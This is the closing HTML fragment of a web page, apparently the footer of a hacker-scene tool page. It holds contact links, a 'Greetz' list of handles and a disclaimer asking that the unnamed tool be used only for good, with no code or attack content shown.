</font><font face="Verdana"><font color="#23B627">
<a href="mailto:exploit-id@hotmail.com"><span style="text-decoration: none">
<font color="#000000">My Email</font></span></a></font> | <font color="#23B627">
<a href="http://facebook.com/Mr.H4rD3n"><span style="text-decoration: none">
<font color="#000000">Facebook</font></span></a></a></font><a href="http://facebook.com/Mr.H4rD3n"><span style="text-decoration: none"><font color="#000000">
</font></span></a>:) </font>
<font color="#FFFFFF"> <br />
\m/ <b>Greetz to</b> : Dr-AngeL - X-Line - Ghost.0f.Morocco - xMjahd - 4chrf -
KhantastiC - X internet - And yOu ! \m/<br />
"" WE ARE MUSLIMS, WE CAN NOT HARM ANY SITE I HOPE TO USE THIS TOOL ONLY WHAT
PLEASE GOD "" </font>
</p>
</div>
</body>
</html>